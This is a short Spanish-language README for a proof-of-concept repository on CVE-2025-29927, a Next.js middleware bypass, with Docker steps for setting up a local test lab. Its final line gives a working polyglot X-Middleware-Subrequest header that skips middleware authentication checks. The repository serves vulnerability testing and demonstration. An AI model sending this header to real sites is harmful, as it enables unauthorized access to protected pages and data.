
PoC para CVE-2025-29927: Vulnerabilidad de omisión de middleware de Next.js. Demuestra cómo x-middleware-subrequest puede omitir las comprobaciones de autenticación. Incluye configuración de Docker para pruebas.
Este repositorio demuestra la vulnerabilidad CVE-2025-29927 en Next.js, donde el encabezado interno x-middleware-subrequest puede usarse para eludir las comprobaciones de middleware como la autenticación.
git clone https://github.com/alihussainzada/CVE-2025-29927-PoC.git
cd CVE-2025-29927-PoC
openssl rand -base64 32
.env:NEXTAUTH_SECRET=your_generated_secret
docker build -t nextjs .
docker run -p 3000:3000 --env-file .env nextjs
Podemos simplificar enormemente la explotación de este problema utilizando un políglota que nos permite cubrir eficazmente los diversos casos potenciales. Logramos esto con el siguiente encabezado HTTP, utilizado para verificar la presencia de un bypass de autenticación:
X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware

